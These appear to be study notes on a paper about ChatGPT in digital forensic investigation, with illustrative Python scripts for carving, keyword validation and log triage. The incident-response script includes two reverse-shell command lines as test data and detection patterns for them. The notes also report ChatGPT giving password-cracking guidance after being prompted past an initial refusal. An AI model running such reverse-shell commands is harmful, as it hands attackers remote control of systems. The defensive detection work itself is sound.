Notes on ChatGPT for Digital Forensic Investigation: The Good, The Bad, and The Unknown

ChatGPT in Digital Forensic Investigation

Objective of the Paper:
- To analyze how ChatGPT, particularly the GPT-4 model, can be applied to digital forensics across several use cases: artifact understanding, evidence searching, code generation, anomaly detection, incident response, and education.
Key Concepts:
- Generative Artificial Intelligence (GAI): A significant innovation whose impact is being debated across many fields, including digital forensics.
- Large Language Models (LLMs): Models such as GPT-3.5 and GPT-4 that generate answers from vast amounts of training data but can produce inaccuracies and 'hallucinated' facts.

Strengths and Weaknesses of ChatGPT

Strengths:
- May assist in educational contexts by providing a foundational understanding of digital forensics, creating keyword lists, generating storyboards for scenarios, and offering reassurance to experienced users.
- Can serve as a tool for code generation, providing a useful starting point for forensic scripts, often with comments and explanations.
Weaknesses:
- Data Reliability: Can produce inaccurate, outdated, or biased information due to limitations in training data. Lacks the ability to access real-time evidence or current event data.
- Contextual Understanding: Poor performance in contexts that require specialized knowledge or real-world understanding of digital forensics processes and tools.
- Reproducibility: Produces inconsistent outputs for identical prompts, which undermines reproducibility, a critical requirement in forensic investigations.
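One way to make the reproducibility concern measurable is to fingerprint each response to a repeated prompt and count how many distinct answers come back. The following is a minimal sketch, not something taken from the paper: the function names, the whitespace normalisation step, and the sample responses are all assumptions made for illustration, and the responses are assumed to have been collected separately.

```python
import hashlib
import json
from collections import Counter


def fingerprint(text: str) -> str:
    """Return a SHA-256 hex digest of the text after collapsing whitespace."""
    normalised = " ".join(text.split())
    return hashlib.sha256(normalised.encode("utf-8")).hexdigest()


def reproducibility_report(prompt: str, responses: list[str]) -> dict:
    """Summarise how many distinct answers one prompt produced."""
    counts = Counter(fingerprint(r) for r in responses)
    # Size of the largest group of identical (normalised) responses.
    largest_group = counts.most_common(1)[0][1] if counts else 0
    return {
        "prompt_sha256": fingerprint(prompt),
        "runs": len(responses),
        "distinct_responses": len(counts),
        "agreement_ratio": largest_group / len(responses) if responses else 0.0,
    }


if __name__ == "__main__":
    # Hypothetical responses gathered from three runs of the same prompt.
    sample = [
        "Check the browser history database.",
        "Check the  browser history database.",  # differs only in spacing
        "Review the Windows event logs.",
    ]
    report = reproducibility_report("Where are download artifacts?", sample)
    print(json.dumps(report, indent=2))
```

Storing the prompt digest alongside each response digest also gives a simple audit trail of what was asked and what was returned, which is useful if the output later informs a finding. Exact-match hashing is deliberately strict: two answers with the same meaning but different wording count as different.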

Specific Use Cases Evaluated

Artifact Identification
- File Downloads and Executions: Assisted investigators in identifying relevant artifacts like browser history, Windows event logs, and other system activity.
- Cloud Interactions: Generated possible sources of evidence from cloud platforms, although it occasionally provided inaccurate paths or referred to tools that may not exist.
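Because suggested artifact locations can be inaccurate, it may help to check each suggestion against a mounted copy of the evidence before relying on it. The sketch below assumes a read-only mount point and a list of relative paths copied from a model's answer. The function name and the demo paths are hypothetical and do not correspond to real artifact locations.

```python
import tempfile
from pathlib import Path


def check_suggested_paths(mount_root: Path, suggested: list[str]) -> dict[str, bool]:
    """Map each suggested path to whether it exists under mount_root."""
    results = {}
    for rel in suggested:
        # Accept Windows-style separators and drop leading slashes so the
        # candidate is always resolved relative to the mount point.
        cleaned = rel.replace("\\", "/").lstrip("/")
        results[rel] = (mount_root / cleaned).exists()
    return results


if __name__ == "__main__":
    # Build a throwaway directory tree standing in for a mounted image.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Users" / "demo").mkdir(parents=True)
        (root / "Users" / "demo" / "history.db").write_text("placeholder")

        suggestions = [
            "Users\\demo\\history.db",   # hypothetical path that exists
            "/Users/demo/missing.db",    # hypothetical path that does not
        ]
        for path, found in check_suggested_paths(root, suggestions).items():
            print(f"{'FOUND  ' if found else 'MISSING'} {path}")
```

A missing path does not prove the suggestion was hallucinated, since the artifact may simply be absent on that system, but it flags the item for manual verification against trusted documentation.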
Self-Directed Learning in Digital Forensics
- Introductory Level: Provided reasonable overviews of fundamental topics but had inaccuracies regarding specific process models and references.
- Advanced Level: Suggested general hands-on exercises but lacked depth in complex technical explanations.
Keyword Searching
- Capable of generating regular expressions and keyword lists, although these required validation for practical application in investigations. The commands provided, while detailed, sometimes failed to cover all necessary formats.
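The validation step mentioned above can be as simple as running a candidate pattern against samples that are known to be relevant and samples that are known to be irrelevant. This is a minimal sketch under assumed inputs: the candidate pattern and the sample strings are invented for illustration and were not produced in the paper.

```python
import re


def validate_pattern(pattern: str, should_match: list[str], should_not_match: list[str]) -> dict:
    """Report which known-good samples are missed and which known-bad ones hit."""
    compiled = re.compile(pattern)
    missed = [s for s in should_match if not compiled.fullmatch(s)]
    false_hits = [s for s in should_not_match if compiled.fullmatch(s)]
    return {"missed": missed, "false_hits": false_hits}


if __name__ == "__main__":
    # Hypothetical model-suggested pattern for phone numbers.
    candidate = r"\d{3}-\d{3}-\d{4}"
    result = validate_pattern(
        candidate,
        should_match=["555-123-4567", "(555) 123-4567"],
        should_not_match=["5551234", "not a number"],
    )
    print(result)
    # → {'missed': ['(555) 123-4567'], 'false_hits': []}
```

Here the candidate misses the parenthesised format, which mirrors the observation that generated expressions sometimes fail to cover all necessary formats. The sample lists should come from the investigator, not from the model that wrote the pattern.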
Assistance in Code Generation
- Successfully created scripts for tasks such as file carving, RAID disk acquisition, and processing encrypted zip files. It often refused initial requests for potentially illegal tasks such as password cracking, but provided alternative guidance upon further prompting.
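To give a sense of what a "starting point" carving script looks like, here is a minimal sketch of signature-based JPEG carving. It is not the script produced in the paper. It assumes the whole input fits in memory and that files are contiguous, and it pairs each JPEG start marker (FF D8 FF) with the next end marker (FF D9), so embedded thumbnails and fragmented files will be carved incorrectly. The function name and the size cap are illustrative choices.

```python
JPEG_SOI = b"\xff\xd8\xff"  # start-of-image marker plus first byte of next marker
JPEG_EOI = b"\xff\xd9"      # end-of-image marker


def carve_jpegs(data: bytes, max_size: int = 10 * 1024 * 1024) -> list[tuple[int, bytes]]:
    """Return (offset, bytes) for each header/footer pair found in data."""
    carved = []
    pos = 0
    while True:
        start = data.find(JPEG_SOI, pos)
        if start == -1:
            break
        end = data.find(JPEG_EOI, start + len(JPEG_SOI))
        if end == -1:
            break  # header without any footer after it
        end += len(JPEG_EOI)
        if end - start <= max_size:
            carved.append((start, data[start:end]))
            pos = end
        else:
            # Implausibly large candidate: skip this header and keep scanning.
            pos = start + 1
    return carved


if __name__ == "__main__":
    # Synthetic buffer with two fake "images" surrounded by filler bytes.
    blob = (
        b"junk"
        + b"\xff\xd8\xff\xe0" + b"AAAA" + b"\xff\xd9"
        + b"more"
        + b"\xff\xd8\xff\xe1" + b"BB" + b"\xff\xd9"
    )
    for offset, chunk in carve_jpegs(blob):
        print(f"offset={offset} length={len(chunk)}")
```

Any carved output would still need to be validated, for example by opening it with an image parser and recording its hash, before it is treated as evidence.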
Incident Response
- Identified anomalies such as failed SSH login attempts but struggled to notice clear indicators such as reverse shells unless they were specifically pointed out.
- Offered basic interpretations of event logs and process listings but lacked a robust understanding of custom or unique attack signatures, reflecting limitations in contextual awareness.
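The two kinds of indicator discussed above can also be checked deterministically, which gives a baseline to compare a model's reading against. The sketch below counts failed SSH password attempts per source address and flags process command lines that contain common reverse-shell idioms. It assumes OpenSSH-style "Failed password" log lines. The two reverse-shell patterns are illustrative heuristics chosen for this example, not a complete signature set, and the function names are hypothetical.

```python
import re
from collections import Counter

# Matches lines such as:
#   "Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2"
FAILED_SSH = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")

# Illustrative reverse-shell hints only; real detections need far broader coverage.
REVERSE_SHELL_HINTS = [
    re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),  # bash /dev/tcp redirection
    re.compile(r"\bnc(?:at)?\b.*\s-e\s"),                  # netcat with -e <program>
]


def failed_ssh_by_source(lines: list[str], threshold: int = 3) -> dict[str, int]:
    """Return source addresses with at least `threshold` failed attempts."""
    counts = Counter()
    for line in lines:
        match = FAILED_SSH.search(line)
        if match:
            counts[match.group(2)] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def suspicious_processes(process_lines: list[str]) -> list[str]:
    """Return command lines that match any reverse-shell hint."""
    return [
        line for line in process_lines
        if any(p.search(line) for p in REVERSE_SHELL_HINTS)
    ]


if __name__ == "__main__":
    # Synthetic log and process data using documentation-only IP ranges.
    auth_log = [
        "sshd[101]: Failed password for root from 203.0.113.5 port 40001 ssh2",
        "sshd[102]: Failed password for invalid user admin from 203.0.113.5 port 40002 ssh2",
        "sshd[103]: Failed password for root from 203.0.113.5 port 40003 ssh2",
        "sshd[104]: Failed password for alice from 198.51.100.9 port 40004 ssh2",
        "sshd[105]: Accepted password for alice from 198.51.100.9 port 40005 ssh2",
    ]
    processes = [
        "/usr/sbin/sshd -D",
        "bash -i >& /dev/tcp/198.51.100.7/4444 0>&1",
        "nc -e /bin/sh 198.51.100.7 4444",
    ]
    print(failed_ssh_by_source(auth_log))
    print(suspicious_processes(processes))
```

Fixed patterns like these share the weakness noted above: they only catch what they were written for, so custom or unusual attack signatures still require analyst judgment.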
Teaching Scenario Generation
- Demonstrated potential in generating storyboards and characters for teaching digital forensics, with the ability to create complex narratives and character backgrounds useful in educational contexts.

Conclusion and Future Directions

ChatGPT holds promise as a supportive tool in digital forensic investigations, particularly for those with foundational knowledge. There are multiple areas for further exploration, including embedding LLMs within forensic products for real-time querying and analysis.
Limitations to Acknowledge:
- These findings come from experimental settings that may not fully replicate the complexity of real-world digital forensic tasks. Human expertise remains essential for using AI capabilities effectively.